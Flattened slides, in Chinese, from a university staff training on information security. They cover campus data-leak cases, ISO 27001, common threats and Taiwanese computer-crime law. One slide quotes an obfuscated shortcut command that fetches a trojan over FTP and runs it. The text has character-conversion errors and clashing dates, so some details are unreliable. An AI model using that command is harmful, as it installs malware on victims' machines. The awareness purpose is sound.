学校27001培训教材信息安全理念培训

華梵大學

資訊平安認知與資安法令介紹

(教職員)

威播科技2021/01/19陳治豪副總經理教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令大綱教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令教育體系資訊平安事件案例教育體系單位新聞日期新聞標題新聞來源新聞網址某大學講師98.09.16假冒恩師發出求救e-mail大學講師匯款被騙中廣新聞網/bcc/society/200909/20090916567932.html玄奘大學98.08.09網po露鳥照大二生辯研究同志蘋果日報/applenews/article/art_id/31848632/IssueID/20090809大學考試入學分發委員會98.08.09同學冒填志願資優生落榜自由時報.tw/2009/new/aug/9/today-life1.htm98.08.09《大學分發會亡羊補牢》資安不足擬改採自然人憑證自由時報.tw/2009/new/aug/9/today-life1-2.htm98.08.09冒填志願者明送辦可處刑三年以下聯合報/2009/8/9/NEWS/NATIONAL/NAT4/5066396.shtml98.08.08明星高中同學交惡冒填志願害他落榜聯合報/mag/campus/storypage.jsp?f_MAIN_ID=12&f_SUB_ID=31&f_ART_ID=207257亞洲大學98.07.17女大學生當駭客改情敵選課自由時報.tw/2009/new/jul/17/today-so12.htm義守大學98.07.17好玩幫同學退選課惡作劇生被起訴TVBS.tw/news/news_list.asp?no=aj100920090716131732國科會98.06.27國科會網站洩1.8萬個資身分證字號學號全都露「離譜」蘋果日報/applenews/article/art_id/31742117/IssueID/20090627台中縣教育處98.06.01台灣多所學校師生個資外洩百度查得到資安人.tw/article/article_detail.aspx?aid=498198.05.30數百教師個資百度看光光聯合報/mag/campus/storypage.jsp?f_ART_ID=196607台中高農98.05.06火燒拍打電擊?高職生虐鳥PO網聯合報/taichungnews/2920138某高中98.05.04分享畢旅全裸照慘遭破解永流傳自由時報.tw/2009/new/may/4/today-so9.htm教育體系資訊平安事件案例教育體系單位新聞日期新聞標題新聞來源新聞網址台東縣興隆國小98.04.05色情入侵教育網站興隆國小無計可施資安之眼http://www.itis.tw/node/2674某科技大學女學生98.04.03轉貼猥褻文章女大生罰萬元聯合報/jw!_otax4eFBQTAWONNaXAPzA--/article?mid=1319&prev=-1&next=1314彰化縣國中小校長98.03.214校長涉賣10萬學生個資自由時報.tw/2009/new/mar/21/today-fo2.htm98.03.21何必找校長?學生個資2元買得到自由時報.tw/2009/new/mar/21/today-fo2-2.htm某大學博士生98.01.13PO性愛影片博士生害博士女友聯合報/index.php/viewnews-15866.html教育體系資訊平安事件案例教育體系單位新聞日期新聞標題新聞來源新聞網址稻江科技學院、政大97.11.23學生個資外洩稻江、政大急撤網頁自由時報.tw/2008/new/nov/23/today-life9.htm彰化縣政府教育處97.11.19彰化縣府網站洩原民學生個資自由時報.tw/2008/new/nov/19/today-complain2.htm中興大學97.10.24男友的前女友惡搞我選課

中興大學學姊報復學妹上網刪除選課資料觸五年罪刑學妹不提告「算了吧」聯合報.tw/FocusDetail.asp?id=1412國中基測、高雄縣市及台北縣等多所國中校務系統與網站97.06.26基測個資外洩案》竄改3推甄生成績交換個資聯合報/2008/6/26/NEWS/SOCIETY/SOC1/4400762.shtml97.06.2617歲駭客竊80餘所國中個資中時電子報/ajwin/198978697.06.25國中基測考生資料外洩案高中生駭客涉案中央社/b5/8/6/25/n2168156.htm97.06.25遭駭客入侵高市教育局加強網路機密維護中央社/b5/8/6/25/n2168264p.htm97.06.18基測個資外洩教育部：制度面確實需檢討中廣新聞網/bcc/garden/200806/20080618055484.html97.06.18保障國中基測個資呂木琳:資安認證盡量做中央社/2007Cti/2007Cti-News/2007Cti-News-Content/0,4521,130503+132008061801141,00.html97.06.17國中基測資料外洩31萬考生遭販售資安人.tw/article/article_detail.aspx?aid=446797.06.14基測考生個資傳外洩教部調查台灣時報.tw/html/modules/news/article.php?storyid=1035497.06.1331萬基測考生個資驚傳外洩NOWnews/2008/06/13/545-2289164.htm2021-11-23自由時報學生個資外洩稻江、政大急撤網頁〔記者林曉雲／台北報導〕又傳出學生個資被學校外洩的個案！教育部大專院校弱勢學生助學計畫審查結果出爐，各大專院校陸續通知學生審查結果，卻發生稻江科技暨管理學院及國立政治大學將學生身分證字號、家庭年收入審核資料公布於校內網站供點閱，引發疑慮。稻江管理學院學務長林連禎表示，教育部審查結果出來後，為迅速且方便申請同學知悉，學校才會直接把審查結果公布在校內網頁上，不慎公布個人資料是無心之過。稻江共有五十一位同學通過審查獲得補助。政治大學學務處則表示，今年度的獎助學金辦法有修正，為確保學生收到訊息，且讓未通過審查的學生可儘早提出申訴，才會在網路上公告身分證字號及審核結果。稻江管理學院受到質疑之後，廿日緊急撤掉網頁上的公告，改以電話個別通知落選學生，並在網頁上公告審核結束的通知，讓申請學生自行查詢；政大也在廿日撤掉網頁的文件連結，另採適當方式公告。不過，政大學生會會長羅羿表示，學校本來就該公告結果，假设個別通知，恐有黑箱作業的疑慮，學校僅公告身分證號碼，未公告學生姓名及系級，可以保護家境清寒的學生免於曝光，技術上來說，還算平安。教育部高教司副司長楊玉惠表示，學生個人隱私不應該被公布在網路上，學生的身分證號碼可能會被有心人士作不當使用，要告知審查結果，還有更他平安而隱密的方法，學校把審查結果公布在網路上是一種偷懶的方式，並不妥當。教育部高教司科長蔡忠益說，以教育部的立場，無權要求學校制定一套制式的公告文件程序。今年度教育部的弱勢學生助學計畫更改做法，採級距式補助，補助級距分為五級，補助金額為五千到三萬五千元，以減輕弱勢學生籌措學費的負擔。台灣大學一向以電子郵件通知申請獎助學金的學生，不會在網頁上公告相關資料，並另設一套線上服務系統，提供申請學生登記及查詢。學生個資外洩稻江、政大急撤網頁8教育體系資安事件歸納技術面制度面認知面資源不足人力經費網頁遭竄改資料庫被入侵系統登入機制被破解系統或網路服務中斷垃圾郵件資料外洩相簿破解刊登色情照片/影片侵權MP3/文章下載網路誹謗網路交易糾紛網路釣魚網路詐騙個資外洩未建立資安管理制度資安管理制度未落實強化系統平安落實之管理制度執行易於操作與增進資安意識認知教育訓練教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令資訊平安，必須注意……………機密性(Confidentiality)確保只有被授權的人可以存取完整性(Integrity)確保資訊及處理方法的正確及完整可用性(Availability)確保被授權的人有需要時可以存取機密性完整性可用性ISMS〔Informationsecuritymanagementsystem〕稱為「資訊平安管理系統」或「資訊平安管理制度」：乃組織整體管理制度的一部份，必需依據風險管理的方法加以制訂，進而用以建立、執行、操作、監控、審查、維護與改進組織的資訊平安。ISMS目的在於保護資訊資產的機密性、可用性與完整性。AllRightsReservedbyNIIEPA何謂ISMS為目前國際上最廣泛採用之資訊平安管理制度標準規範，為建立完善之資訊平安管理制度提供一個良好的起點及系統化的方法資訊平安管理制度標準規範中，絕大部份著重的是在於管理面的要求，其次才是技術面的專業知識此制度標準規範提醒在建構及管理整個制度面時，所須留意且不可忽略的層面，並藉由審查機制、事件的回饋及內部稽核，以預防資訊平安事件的或是降低損失的風險何謂ISO

27001ISO27001認證全球推廣狀況Asof2021/12

英國-405義大利-58日本–3378印度-483台灣-344德國-134韓國-105美國-95香港-31中國-250澳洲-29匈牙利-66新加坡-12捷克-84ISO27001認證全球推廣狀況Japan

3378India

483UK

405Taiwan

344China

250Germany

134USA95Korea

105CzechRepublic84Hungary66RelativeTotal6037Asof2021/12Top10資訊使用之『環境』資訊使用之『技術』資訊使用之『規定』資訊使用『人員』資訊平安範圍環境技術規定人員11個領域、39個控制目標、133個控制要點法令規章遵循業務持續管理資安事件實體安全通訊管理系統維護存取控制資訊資產管理資訊安全組織資訊安全政策資訊安全稽

核人員安全提升組織競爭力與形象確保業務資訊之機密性、完整性與可用性降低資訊平安威脅建立資源管理機制建立管理程序確保業務持續運作強化風險管理ISO

27001實施效益根據行政院資通平安會報規定，資訊平安等級列A、B級之政府單位必須於96、97年建置完成資訊平安管理系統，並取得第三方驗證通過在政府帶動下，許多電信、金融與資訊服務，為能取得客戶信任，紛紛推動ISMS的建置在法規要求以及客戶期望下，推行ISO27001管理系統已成為組織永續經營之必要工作ISO

27001趨勢20行政院國家資通平安會報

資通平安責任分級作業名稱等級防護縱深ISMS推動稽核方式資安教育訓練(一般主管、資訊人員、資安人員、一般使用者)專業證照檢測機關網站安全弱點A級NSOC直接防護/SOC自建或委外、IDS、防火牆、防毒、郵件過濾裝置通過第三者驗証每年至少2次內稽每年至少(3、6、18、3小時)資訊人員、資安人員需通過資安職能鑑定維持至少2張資安專業證照每年2次B級SOC(選項)、IDS、防火牆、防毒、郵件過濾裝置通過第三者驗証每年至少1次內稽每年至少(3、6、16、3小時)資訊人員、資安人員需通過資安職能鑑定維持至少1張資安專業證照每年1次C級防火牆、防毒、郵件過濾裝置自行成立推動小組規劃作業自我檢視每年至少(2、6、12、3小時)資安專業訓練每年1次D級防火牆、防毒、郵件過濾裝置推動ISMS觀念宣導自我檢視每年至少(1、4、8、2小時)資安專業訓練每年1次教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資安實例討論資訊平安法令USB病毒您可能不曉得…您的電腦病毒是您自己帶回家的！在隨身碟寫入自動執行電腦病毒密碼平安您可能不曉得…您的懶人密碼讓駭客輕易破解您的密碼！使用暴力破解軟體破解網路相簿密碼無線網路威脅您可能不曉得…您輕忽無線網路平安所造成

資安嚴重威脅！無線基地台遭入侵造成帳號密碼外洩釣魚網頁您可能不曉得…您接到詐騙電話是因為您自己在釣魚網站

洩露了帳號密碼！社交工程攻擊您可能不曉得…您早就淪為社交工程攻擊受害者！惡意程式執行檔駭客如何入侵您的電腦？！主動式的攻擊電子郵件即時通上勾式的攻擊釣魚網站工具軟體嵌入惡意程式未更新修補程式平安防護缺乏例如未啟用防火牆功能誘騙您上當植入木馬程式利用漏洞進行入侵媒體報導「駭客侵視訊偷拍出浴女」駭客以木馬程式植入他人電腦，再遠端開啟女子電腦上的攝影機…木馬程式所以您要曉得，這些木馬程式威力強大，一旦中招，可能就任由宰割了！被遙控的電腦木馬程式的威脅您不能依賴防毒軟體能幫您阻擋掉所有的木馬程式，因為這些惡意程式可能利用「加殼免殺」技術避過防毒軟體的偵測！木馬程式的技倆所以只要想辦法讓您去執行它…您就被植入木馬程式了！！林志玲MaggieQ露三點寫真三點寫真電子郵件攻擊的陷阱夾帶惡意程式執行檔內文中的惡意網頁超連結Html郵件隱藏遠端下載夾帶惡意程式執行檔常見的惡意程式執行檔類型「捷徑」亦是下載與執行惡意程式的方法.exe.com.bat.pif.scr.lnk小新的自白書.bat預防帳號盜用.lnk「捷徑」攻擊技倆解析捷徑是一串DOS指令的集合此例中，這串指令執行了連接一個伺服器下載惡意程式(木馬程式)執行它！%ComSpec%/cseth=p-&setj=ge&sets=.g03z.&echoechoowww%s%com^>t>b.bat&callb.bat&echoaa33>>t&echobb33>>t&echoecho%j%tpp.vbs^>^>t>>c&echoechobye^>^>t>>c&echoft%h%s:t>>c&echostartp.vbs>>c&rench.bat&callh.bat&內文中的惡意網頁超連結36畫面上顯示的連結網址與真實網址不同…惡意網頁技倆解析利用工具將惡意程式執行檔(.exe)轉檔為.bmp、.htm和.asp三個檔案，放上網頁當您受騙連上這個鏈結網址(.htm)，即下載安裝了這個惡意程式！Html郵件隱藏遠端下載Html電子郵件可以在Html中撰寫程式語法，所以您只要瀏覽電子郵件，就觸發該程式執行利用IE漏洞，不開啟附檔也會中毒！2004年3月，Beagle.O電腦病毒使用IE漏洞攻擊，使用者在Outlook/OutlookExpress環境下啟用信件預覽功能，信件中的script就會啟動，連結到惡意程式網站下載病毒程式Html郵件遠端下載範例發信端收信端夾帶了一張遠端下載圖片，並將圖片隱藏在這個範例中，遠端下載圖片有被阻擋Html郵件遠端下載範例(續)如果收信端下載了這張圖片，即沒有設定阻擋籍這張圖片下載，發信端獲取了他的電腦環境資料…關閉自動下載圖片以MicrosoftOutlook2007為例關閉自動下載圖片以OutlookExpress為例工具軟體嵌入惡意程式例如將惡意程式執行檔偽裝成一個自解壓縮檔所以您以為您下載了一個某壓縮檔，但其實您一點擊(您以為是解壓縮)，惡意程式就執行與植入了！惡意程式偽裝技倆解析–變更檔案圖示工具軟體嵌入惡意程式將A(您想下載的檔案)、B(惡意程式)兩個檔案合併成一個新檔案，並命名為A執行這個新檔案時，A、B兩個檔案都會執行您會看到A檔案正常執行，但您大概不曉得B檔案也已同時安裝進您的電腦！惡意程式偽裝技倆解析–合併檔案利用漏洞進行入侵網路上有各種利用系統漏洞/軟體漏洞進行攻擊的惡意程式假设您沒有即時更新修補程式，您就可能成為這些惡意程式的受害者利用尚未更新修補程式的漏洞利用漏洞進行入侵很多攻擊手法都是利用您電腦的平安防護缺乏才能成功入侵例如如果您啟用了防火牆那麼利用網路掃瞄來試圖入侵，大概就無效！如果您更新了最新的病毒碼那麼試圖置入特定程式的入侵方法，也會無效！利用平安防護缺乏的漏洞教育體系資安案例資訊平安概述暨ISO27001常見的資訊平安威脅資訊平安法令國家機密保護法電子簽章法刑法(防駭條款)電腦處理個人資料保護法檔案法著作權法行政院及所屬各機關資通平安管理要點機關公文電子交換作業辦法智慧財產權IntellectualPropertyRights(IPR)資訊平安相關法令妨害電腦使用罪隨著資訊科技快速發展，網際網路應用日益普及與多元，除了帶給我們許多生活上的便利，但也衍生一些資訊平安問題，特別是網路犯罪行為已有增多趨勢網路犯罪行為大約可歸類以下三種以網路作為犯罪工具–網路詐欺、網路恐嚇等以網路作為攻擊標的–竄改檔案、阻斷式服務攻擊、駭客入侵、電腦病毒等以網路作為犯罪場所–如色情、誹謗、賭博等為防止電腦犯罪與維護網路秩序，特於刑法中設立相關法令條文以為管理-刑法第36章「妨害電腦使用罪」章妨害電腦使用罪主要內容第358條無故入侵電腦罪無故輸入他人帳號密碼、破解使用電腦之保護措施或利用電腦系統之漏洞，而入侵他人之電腦或其相關設備者，處三年以下有期徒刑、拘役或科或併科十萬元以下罰金。本條主要目的為遏止駭客入侵行為第359條無故取得、刪除或變更他人電磁紀錄罪無故取得、刪除或變更他人電腦或其相關設備之電磁紀錄，致生損害於公眾或他人者，處五年以下有期徒刑、拘役或科或併科二十萬元以下罰金本條主要目的為確保電腦內部電磁紀錄平安第360條無故干擾電腦系統罪無故以電腦程式或其他電磁方式干擾他人電腦或其相關設備，致生損害於公眾或他人者，處三年以下有期徒刑、拘役或科或併科十萬元以下罰金本條主要目的為維護電腦及網路運作正常妨害電腦使用罪主要內容第361條對公務機關犯罪之加重對於公務機關之電腦或其相關設備犯前三條之罪者，加重其刑至二分之一本條主要目的為確保國家平安第362條製作供犯罪程式罪製作專供犯本章之罪之電腦程式，而供自己或他人犯本章之罪，致生損害於公眾或他人者，處五年以下有期徒刑、拘役或科或併科二十萬元以下罰金本條主要目的為防止犯罪工具之利用與擴散第363條告訴乃論第三百五十八條至第三百六十條之罪，須告訴乃論本條主要目的為集中司法資源對抗重大犯罪電腦處理個人資料保護法說明(1)立法目的對公務與非公務機關蒐集、處理、與利用個人資料的情形，加以明文規範防止個人人格權〔隱私權〕遭受侵害，促進個人資料之合理利用，特此制定電腦處理個人資料保護法保護客體本法保護客體限於經電腦處理的個人資料受本法保護之個人資料以現仍生存之自然人為限，已死亡之自然人與法人，不受本法之規範個人資料包含:自然人之姓名、出生年月日、身分證統一編號、特徵、指紋、婚姻、家庭、教育、職業、健康、病歷、財務情況、社交活動、及其他足以識別該個人之資料電腦處理個人資料保護法說明(2)適用主體本法規範的對象有公務機關及非公務機關公務機關係指依法行使公權力之中央或地方機關非公務機關係指以下所列之事業、團體或個人徵信業、以蒐集或電腦處理個人資料為主要業務之團體或個人醫院、學校、電信業、金融業、證券業、保險業、大眾傳播業其他經法務部會同中央目的事業主管機關指定之事業、團體或個人受公務機關或非公務機關委託處理資料之團體或個人，於本法適用範圍內，其處理資料之人，視同委託機關之人電腦處理個人資料保護法說明(3)機關對個人資料之蒐集或利用的原則應尊重當事人之權益，依誠實及信用方法為之不得逾越特定目的之必要範圍，以確保當事人權益，防止人格權受到侵害揭露個人資料，當事人是主要關鍵人物，當事人本身需審慎決定何者為提供給公務與非公務機關的必要個人資料電腦處理個人資料保護法修訂草案修法背景法務部為因應急速變遷之社會環境，特別彙整國內學界與實務界的相關修法建議，並參考其他國家之個人資料保護相關法令來針對本法進行修訂修訂草案共有55條，並將本法名稱修訂為「個人資料保護法」

草案修正方向擴大保護客體普遍適用主體增修行為規範強化行政監督妥適調整罰則促進民眾參與電腦處理個人資料保護法修訂草案修法重點說明將買賣個人資料行為從告訴乃論罪修改為公訴罪，並提高刑責，最高為五年有期徒刑寄廣告信、垃圾郵件將觸法，未經個人同意，網路公司或個體戶大舉販賣蒐集的大筆電子郵件信箱供寄發垃圾郵件等行為，均將觸犯本法，檢警接獲檢舉後必須主動追查假设是公務員涉案，依法得加重其刑二分之一，最重可處七年半徒刑，與刑責已接近涉及貪瀆案重罰意圖營利而違法的行為，修訂草案大幅加重「意圖營利而違法蒐集、利用或盜賣個人資料者」的刑責，由原本二年以下徒刑，提高為五年以下徒刑，且併科由原先四萬元大幅提高為五百萬元罰金行政院於98年5月13日公佈著作權法局部條文修正，第六章之一「網路服務提供者民事免責事由」或稱「ISP責任避風港條款」網路服務提供者包含︰連線服務提供者(Hinet、Seednet、